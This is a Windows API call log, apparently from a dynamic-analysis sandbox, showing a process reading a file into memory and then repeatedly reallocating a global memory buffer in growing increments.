[0200.170] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x10f7d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x10f7d0*=0) returned 0x10be00
[0200.170] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x10f7d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x10f7d0*=0) returned 0x0
[0200.171] GlobalLock (hMem=0x580004) returned 0x2310020
[0200.171] ReadFile (in: hFile=0x98, lpBuffer=0x2310020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x10f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2310020*, lpNumberOfBytesRead=0x10f7ec*=0x10be00, lpOverlapped=0x0) returned 1
[0200.236] CloseHandle (hObject=0x98) returned 1
[0200.237] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.237] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.237] GlobalUnlock (hMem=0x58000c) returned 0
[0200.237] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4000, uFlags=0x2) returned 0x58000c
[0200.237] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.238] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.238] GlobalUnlock (hMem=0x58000c) returned 0
[0200.238] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6000, uFlags=0x2) returned 0x58000c
[0200.238] GlobalLock (hMem=0x58000c) returned 0x13a820
[0200.239] GlobalHandle (pMem=0x13a820) returned 0x58000c
[0200.239] GlobalUnlock (hMem=0x58000c) returned 0
[0200.239] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8000, uFlags=0x2) returned 0x58000c
[0200.239] GlobalLock (hMem=0x58000c) returned 0x140830
[0200.240] GlobalHandle (pMem=0x140830) returned 0x58000c
[0200.240] GlobalUnlock (hMem=0x58000c) returned 0
[0200.240] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa000, uFlags=0x2) returned 0x58000c
[0200.240] GlobalLock (hMem=0x58000c) returned 0x140830
[0200.240] GlobalHandle (pMem=0x140830) returned 0x58000c
[0200.240] GlobalUnlock (hMem=0x58000c) returned 0
[0200.240] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc000, uFlags=0x2) returned 0x58000c
[0200.241] GlobalLock (hMem=0x58000c) returned 0x14a840
[0200.241] GlobalHandle (pMem=0x14a840) returned 0x58000c
[0200.241] GlobalUnlock (hMem=0x58000c) returned 0
[0200.241] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe000, uFlags=0x2) returned 0x58000c
[0200.241] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.242] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.242] GlobalUnlock (hMem=0x58000c) returned 0
[0200.242] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10000, uFlags=0x2) returned 0x58000c
[0200.242] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.242] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.242] GlobalUnlock (hMem=0x58000c) returned 0
[0200.242] GlobalReAlloc (hMem=0x58000c, dwBytes=0x12000, uFlags=0x2) returned 0x58000c
[0200.242] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.243] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.243] GlobalUnlock (hMem=0x58000c) returned 0
[0200.243] GlobalReAlloc (hMem=0x58000c, dwBytes=0x14000, uFlags=0x2) returned 0x58000c
[0200.243] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.243] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.243] GlobalUnlock (hMem=0x58000c) returned 0
[0200.243] GlobalReAlloc (hMem=0x58000c, dwBytes=0x16000, uFlags=0x2) returned 0x58000c
[0200.243] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.244] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.244] GlobalUnlock (hMem=0x58000c) returned 0
[0200.244] GlobalReAlloc (hMem=0x58000c, dwBytes=0x18000, uFlags=0x2) returned 0x58000c
[0200.244] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.244] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.244] GlobalUnlock (hMem=0x58000c) returned 0
[0200.244] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1a000, uFlags=0x2) returned 0x58000c
[0200.244] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.245] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.245] GlobalUnlock (hMem=0x58000c) returned 0
[0200.245] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1c000, uFlags=0x2) returned 0x58000c
[0200.245] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.245] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.245] GlobalUnlock (hMem=0x58000c) returned 0
[0200.245] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1e000, uFlags=0x2) returned 0x58000c
[0200.245] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.246] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.246] GlobalUnlock (hMem=0x58000c) returned 0
[0200.246] GlobalReAlloc (hMem=0x58000c, dwBytes=0x20000, uFlags=0x2) returned 0x58000c
[0200.246] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.246] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.246] GlobalUnlock (hMem=0x58000c) returned 0
[0200.246] GlobalReAlloc (hMem=0x58000c, dwBytes=0x22000, uFlags=0x2) returned 0x58000c
[0200.248] GlobalLock (hMem=0x58000c) returned 0x156820
[0200.248] GlobalHandle (pMem=0x156820) returned 0x58000c
[0200.248] GlobalUnlock (hMem=0x58000c) returned 0
[0200.248] GlobalReAlloc (hMem=0x58000c, dwBytes=0x24000, uFlags=0x2) returned 0x58000c
[0200.248] GlobalLock (hMem=0x58000c) returned 0x156820
[0200.249] GlobalHandle (pMem=0x156820) returned 0x58000c
[0200.249] GlobalUnlock (hMem=0x58000c) returned 0
[0200.249] GlobalReAlloc (hMem=0x58000c, dwBytes=0x26000, uFlags=0x2) returned 0x58000c
[0200.250] GlobalLock (hMem=0x58000c) returned 0x17a830
[0200.251] GlobalHandle (pMem=0x17a830) returned 0x58000c
[0200.251] GlobalUnlock (hMem=0x58000c) returned 0
[0200.251] GlobalReAlloc (hMem=0x58000c, dwBytes=0x28000, uFlags=0x2) returned 0x58000c
[0200.251] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.251] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.251] GlobalUnlock (hMem=0x58000c) returned 0
[0200.251] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2a000, uFlags=0x2) returned 0x58000c
[0200.251] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.252] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.252] GlobalUnlock (hMem=0x58000c) returned 0
[0200.252] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2c000, uFlags=0x2) returned 0x58000c
[0200.252] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.252] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.252] GlobalUnlock (hMem=0x58000c) returned 0
[0200.252] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2e000, uFlags=0x2) returned 0x58000c
[0200.252] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.253] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.253] GlobalUnlock (hMem=0x58000c) returned 0
[0200.253] GlobalReAlloc (hMem=0x58000c, dwBytes=0x30000, uFlags=0x2) returned 0x58000c
[0200.253] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.253] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.253] GlobalUnlock (hMem=0x58000c) returned 0
[0200.253] GlobalReAlloc (hMem=0x58000c, dwBytes=0x32000, uFlags=0x2) returned 0x58000c
[0200.253] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.254] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.254] GlobalUnlock (hMem=0x58000c) returned 0
[0200.254] GlobalReAlloc (hMem=0x58000c, dwBytes=0x34000, uFlags=0x2) returned 0x58000c
[0200.254] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.254] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.254] GlobalUnlock (hMem=0x58000c) returned 0
[0200.254] GlobalReAlloc (hMem=0x58000c, dwBytes=0x36000, uFlags=0x2) returned 0x58000c
[0200.254] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.255] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.255] GlobalUnlock (hMem=0x58000c) returned 0
[0200.255] GlobalReAlloc (hMem=0x58000c, dwBytes=0x38000, uFlags=0x2) returned 0x58000c
[0200.255] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.255] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.255] GlobalUnlock (hMem=0x58000c) returned 0
[0200.255] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3a000, uFlags=0x2) returned 0x58000c
[0200.255] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.256] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.256] GlobalUnlock (hMem=0x58000c) returned 0
[0200.256] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3c000, uFlags=0x2) returned 0x58000c
[0200.256] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.256] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.256] GlobalUnlock (hMem=0x58000c) returned 0
[0200.256] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3e000, uFlags=0x2) returned 0x58000c
[0200.256] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.257] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.257] GlobalUnlock (hMem=0x58000c) returned 0
[0200.257] GlobalReAlloc (hMem=0x58000c, dwBytes=0x40000, uFlags=0x2) returned 0x58000c
[0200.257] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.257] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.257] GlobalUnlock (hMem=0x58000c) returned 0
[0200.257] GlobalReAlloc (hMem=0x58000c, dwBytes=0x42000, uFlags=0x2) returned 0x58000c
[0200.257] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.258] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.258] GlobalUnlock (hMem=0x58000c) returned 0
[0200.258] GlobalReAlloc (hMem=0x58000c, dwBytes=0x44000, uFlags=0x2) returned 0x58000c
[0200.258] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.258] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.258] GlobalUnlock (hMem=0x58000c) returned 0
[0200.258] GlobalReAlloc (hMem=0x58000c, dwBytes=0x46000, uFlags=0x2) returned 0x58000c
[0200.258] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.259] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.259] GlobalUnlock (hMem=0x58000c) returned 0
[0200.259] GlobalReAlloc (hMem=0x58000c, dwBytes=0x48000, uFlags=0x2) returned 0x58000c
[0200.259] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.259] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.259] GlobalUnlock (hMem=0x58000c) returned 0
[0200.259] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4a000, uFlags=0x2) returned 0x58000c
[0200.259] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.260] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.260] GlobalUnlock (hMem=0x58000c) returned 0
[0200.260] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4c000, uFlags=0x2) returned 0x58000c
[0200.260] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.260] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.260] GlobalUnlock (hMem=0x58000c) returned 0
[0200.260] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4e000, uFlags=0x2) returned 0x58000c
[0200.260] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.261] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.261] GlobalUnlock (hMem=0x58000c) returned 0
[0200.261] GlobalReAlloc (hMem=0x58000c, dwBytes=0x50000, uFlags=0x2) returned 0x58000c
[0200.261] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.261] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.261] GlobalUnlock (hMem=0x58000c) returned 0
[0200.261] GlobalReAlloc (hMem=0x58000c, dwBytes=0x52000, uFlags=0x2) returned 0x58000c
[0200.261] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.262] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.262] GlobalUnlock (hMem=0x58000c) returned 0
[0200.262] GlobalReAlloc (hMem=0x58000c, dwBytes=0x54000, uFlags=0x2) returned 0x58000c
[0200.262] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.262] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.262] GlobalUnlock (hMem=0x58000c) returned 0
[0200.262] GlobalReAlloc (hMem=0x58000c, dwBytes=0x56000, uFlags=0x2) returned 0x58000c
[0200.262] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.263] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.263] GlobalUnlock (hMem=0x58000c) returned 0
[0200.263] GlobalReAlloc (hMem=0x58000c, dwBytes=0x58000, uFlags=0x2) returned 0x58000c
[0200.263] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.263] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.263] GlobalUnlock (hMem=0x58000c) returned 0
[0200.263] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5a000, uFlags=0x2) returned 0x58000c
[0200.263] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.264] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.264] GlobalUnlock (hMem=0x58000c) returned 0
[0200.264] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5c000, uFlags=0x2) returned 0x58000c
[0200.264] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.264] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.264] GlobalUnlock (hMem=0x58000c) returned 0
[0200.264] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5e000, uFlags=0x2) returned 0x58000c
[0200.264] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.265] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.265] GlobalUnlock (hMem=0x58000c) returned 0
[0200.265] GlobalReAlloc (hMem=0x58000c, dwBytes=0x60000, uFlags=0x2) returned 0x58000c
[0200.265] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.265] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.265] GlobalUnlock (hMem=0x58000c) returned 0
[0200.265] GlobalReAlloc (hMem=0x58000c, dwBytes=0x62000, uFlags=0x2) returned 0x58000c
[0200.265] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.266] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.266] GlobalUnlock (hMem=0x58000c) returned 0
[0200.266] GlobalReAlloc (hMem=0x58000c, dwBytes=0x64000, uFlags=0x2) returned 0x58000c
[0200.266] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.266] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.266] GlobalUnlock (hMem=0x58000c) returned 0
[0200.267] GlobalReAlloc (hMem=0x58000c, dwBytes=0x66000, uFlags=0x2) returned 0x58000c
[0200.267] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.267] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.267] GlobalUnlock (hMem=0x58000c) returned 0
[0200.267] GlobalReAlloc (hMem=0x58000c, dwBytes=0x68000, uFlags=0x2) returned 0x58000c
[0200.267] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.267] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.267] GlobalUnlock (hMem=0x58000c) returned 0
[0200.267] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6a000, uFlags=0x2) returned 0x58000c
[0200.267] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.268] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.268] GlobalUnlock (hMem=0x58000c) returned 0
[0200.268] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6c000, uFlags=0x2) returned 0x58000c
[0200.272] GlobalLock (hMem=0x58000c) returned 0x1a0820
[0200.272] GlobalHandle (pMem=0x1a0820) returned 0x58000c
[0200.272] GlobalUnlock (hMem=0x58000c) returned 0
[0200.272] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6e000, uFlags=0x2) returned 0x58000c
[0200.272] GlobalLock (hMem=0x58000c) returned 0x1a0820
[0200.273] GlobalHandle (pMem=0x1a0820) returned 0x58000c
[0200.273] GlobalUnlock (hMem=0x58000c) returned 0
[0200.273] GlobalReAlloc (hMem=0x58000c, dwBytes=0x70000, uFlags=0x2) returned 0x58000c
[0200.331] GlobalLock (hMem=0x58000c) returned 0x2420048
[0200.331] GlobalHandle (pMem=0x2420048) returned 0x58000c
[0200.331] GlobalUnlock (hMem=0x58000c) returned 0
[0200.331] GlobalReAlloc (hMem=0x58000c, dwBytes=0x72000, uFlags=0x2) returned 0x58000c
[0200.335] GlobalLock (hMem=0x58000c) returned 0x2490058
[0200.336] GlobalHandle (pMem=0x2490058) returned 0x58000c
[0200.336] GlobalUnlock (hMem=0x58000c) returned 0
[0200.336] GlobalReAlloc (hMem=0x58000c, dwBytes=0x74000, uFlags=0x2) returned 0x58000c
[0200.336] GlobalLock (hMem=0x58000c) returned 0x2490058
[0200.337] GlobalHandle (pMem=0x2490058) returned 0x58000c
[0200.337] GlobalUnlock (hMem=0x58000c) returned 0
[0200.337] GlobalReAlloc (hMem=0x58000c, dwBytes=0x76000, uFlags=0x2) returned 0x58000c
[0200.348] GlobalLock (hMem=0x58000c) returned 0x136810
[0200.349] GlobalHandle (pMem=0x136810) returned 0x58000c
[0200.349] GlobalUnlock (hMem=0x58000c) returned 0
[0200.349] GlobalReAlloc (hMem=0x58000c, dwBytes=0x78000, uFlags=0x2) returned 0x58000c
[0200.353] GlobalLock (hMem=0x58000c) returned 0x2420048
[0200.354] GlobalHandle (pMem=0x2420048) returned 0x58000c
[0200.354] GlobalUnlock (hMem=0x58000c) returned 0
[0200.354] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7a000, uFlags=0x2) returned 0x58000c
[0200.358] GlobalLock (hMem=0x58000c) returned 0x2498058
[0200.359] GlobalHandle (pMem=0x2498058) returned 0x58000c
[0200.359] GlobalUnlock (hMem=0x58000c) returned 0
[0200.359] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7c000, uFlags=0x2) returned 0x58000c
[0200.359] GlobalLock (hMem=0x58000c) returned 0x2498058
[0200.360] GlobalHandle (pMem=0x2498058) returned 0x58000c
[0200.360] GlobalUnlock (hMem=0x58000c) returned 0
[0200.360] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7e000, uFlags=0x2) returned 0x58000c
[0200.372] GlobalLock (hMem=0x58000c) returned 0x2520048
[0200.373] GlobalHandle (pMem=0x2520048) returned 0x58000c
[0200.373] GlobalUnlock (hMem=0x58000c) returned 0
[0200.373] GlobalReAlloc (hMem=0x58000c, dwBytes=0x80000, uFlags=0x2) returned 0x58000c
[0200.436] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.437] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.437] GlobalUnlock (hMem=0x58000c) returned 0
[0200.437] GlobalReAlloc (hMem=0x58000c, dwBytes=0x82000, uFlags=0x2) returned 0x58000c
[0200.445] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.446] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.446] GlobalUnlock (hMem=0x58000c) returned 0
[0200.446] GlobalReAlloc (hMem=0x58000c, dwBytes=0x84000, uFlags=0x2) returned 0x58000c
[0200.455] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.456] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.456] GlobalUnlock (hMem=0x58000c) returned 0
[0200.456] GlobalReAlloc (hMem=0x58000c, dwBytes=0x86000, uFlags=0x2) returned 0x58000c
[0200.465] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.465] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.465] GlobalUnlock (hMem=0x58000c) returned 0
[0200.465] GlobalReAlloc (hMem=0x58000c, dwBytes=0x88000, uFlags=0x2) returned 0x58000c
[0200.522] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.523] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.524] GlobalUnlock (hMem=0x58000c) returned 0
[0200.524] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8a000, uFlags=0x2) returned 0x58000c
[0200.535] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.536] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.536] GlobalUnlock (hMem=0x58000c) returned 0
[0200.536] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8c000, uFlags=0x2) returned 0x58000c
[0200.547] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.594] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.594] GlobalUnlock (hMem=0x58000c) returned 0
[0200.594] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8e000, uFlags=0x2) returned 0x58000c
[0200.603] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.604] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.604] GlobalUnlock (hMem=0x58000c) returned 0
[0200.604] GlobalReAlloc (hMem=0x58000c, dwBytes=0x90000, uFlags=0x2) returned 0x58000c
[0200.614] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.615] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.615] GlobalUnlock (hMem=0x58000c) returned 0
[0200.615] GlobalReAlloc (hMem=0x58000c, dwBytes=0x92000, uFlags=0x2) returned 0x58000c
[0200.625] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.626] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.626] GlobalUnlock (hMem=0x58000c) returned 0
[0200.626] GlobalReAlloc (hMem=0x58000c, dwBytes=0x94000, uFlags=0x2) returned 0x58000c
[0200.636] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.636] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.637] GlobalUnlock (hMem=0x58000c) returned 0
[0200.637] GlobalReAlloc (hMem=0x58000c, dwBytes=0x96000, uFlags=0x2) returned 0x58000c
[0200.693] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.694] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.694] GlobalUnlock (hMem=0x58000c) returned 0
[0200.694] GlobalReAlloc (hMem=0x58000c, dwBytes=0x98000, uFlags=0x2) returned 0x58000c
[0200.704] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.705] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.705] GlobalUnlock (hMem=0x58000c) returned 0
[0200.705] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9a000, uFlags=0x2) returned 0x58000c
[0200.716] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.717] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.717] GlobalUnlock (hMem=0x58000c) returned 0
[0200.717] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9c000, uFlags=0x2) returned 0x58000c
[0200.731] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.731] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.732] GlobalUnlock (hMem=0x58000c) returned 0
[0200.732] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9e000, uFlags=0x2) returned 0x58000c
[0200.777] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.778] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.778] GlobalUnlock (hMem=0x58000c) returned 0
[0200.778] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa0000, uFlags=0x2) returned 0x58000c
[0200.792] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.793] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.793] GlobalUnlock (hMem=0x58000c) returned 0
[0200.793] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa2000, uFlags=0x2) returned 0x58000c
[0200.806] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.807] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.807] GlobalUnlock (hMem=0x58000c) returned 0
[0200.807] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa4000, uFlags=0x2) returned 0x58000c
[0200.866] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.867] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.867] GlobalUnlock (hMem=0x58000c) returned 0
[0200.867] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa6000, uFlags=0x2) returned 0x58000c
[0200.878] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.879] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.879] GlobalUnlock (hMem=0x58000c) returned 0
[0200.879] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa8000, uFlags=0x2) returned 0x58000c
[0200.890] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.891] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.891] GlobalUnlock (hMem=0x58000c) returned 0
[0200.891] GlobalReAlloc (hMem=0x58000c, dwBytes=0xaa000, uFlags=0x2) returned 0x58000c
[0200.902] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.903] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.903] GlobalUnlock (hMem=0x58000c) returned 0
[0200.903] GlobalReAlloc (hMem=0x58000c, dwBytes=0xac000, uFlags=0x2) returned 0x58000c
[0200.962] GlobalLock (hMem=0x58000c) returned 0x1410020
[0200.963] GlobalHandle (pMem=0x1410020) returned 0x58000c
[0200.963] GlobalUnlock (hMem=0x58000c) returned 0
[0200.963] GlobalReAlloc (hMem=0x58000c, dwBytes=0xae000, uFlags=0x2) returned 0x58000c
[0200.974] GlobalLock (hMem=0x58000c) returned 0x2720020
[0200.975] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0200.975] GlobalUnlock (hMem=0x58000c) returned 0
[0200.975] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb0000, uFlags=0x2) returned 0x58000c
[0200.987] GlobalLock (hMem=0x58000c) returned 0x27d0020
[0200.988] GlobalHandle (pMem=0x27d0020) returned 0x58000c
[0200.988] GlobalUnlock (hMem=0x58000c) returned 0
[0200.988] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb2000, uFlags=0x2) returned 0x58000c
[0200.999] GlobalLock (hMem=0x58000c) returned 0x2890020
[0201.000] GlobalHandle (pMem=0x2890020) returned 0x58000c
[0201.000] GlobalUnlock (hMem=0x58000c) returned 0
[0201.000] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb4000, uFlags=0x2) returned 0x58000c
[0201.046] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.047] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.047] GlobalUnlock (hMem=0x58000c) returned 0
[0201.047] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb6000, uFlags=0x2) returned 0x58000c
[0201.060] GlobalLock (hMem=0x58000c) returned 0x27e0020
[0201.061] GlobalHandle (pMem=0x27e0020) returned 0x58000c
[0201.061] GlobalUnlock (hMem=0x58000c) returned 0
[0201.061] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb8000, uFlags=0x2) returned 0x58000c
[0201.074] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.075] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.075] GlobalUnlock (hMem=0x58000c) returned 0
[0201.075] GlobalReAlloc (hMem=0x58000c, dwBytes=0xba000, uFlags=0x2) returned 0x58000c
[0201.150] GlobalLock (hMem=0x58000c) returned 0x27e0020
[0201.151] GlobalHandle (pMem=0x27e0020) returned 0x58000c
[0201.151] GlobalUnlock (hMem=0x58000c) returned 0
[0201.151] GlobalReAlloc (hMem=0x58000c, dwBytes=0xbc000, uFlags=0x2) returned 0x58000c
[0201.164] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.165] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.165] GlobalUnlock (hMem=0x58000c) returned 0
[0201.165] GlobalReAlloc (hMem=0x58000c, dwBytes=0xbe000, uFlags=0x2) returned 0x58000c
[0201.177] GlobalLock (hMem=0x58000c) returned 0x27e0020
[0201.178] GlobalHandle (pMem=0x27e0020) returned 0x58000c
[0201.178] GlobalUnlock (hMem=0x58000c) returned 0
[0201.178] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc0000, uFlags=0x2) returned 0x58000c
[0201.203] GlobalLock (hMem=0x58000c) returned 0x28a0020
[0201.204] GlobalHandle (pMem=0x28a0020) returned 0x58000c
[0201.204] GlobalUnlock (hMem=0x58000c) returned 0
[0201.204] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc2000, uFlags=0x2) returned 0x58000c
[0201.217] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.227] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.227] GlobalUnlock (hMem=0x58000c) returned 0
[0201.227] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc4000, uFlags=0x2) returned 0x58000c
[0201.240] GlobalLock (hMem=0x58000c) returned 0x27f0020
[0201.241] GlobalHandle (pMem=0x27f0020) returned 0x58000c
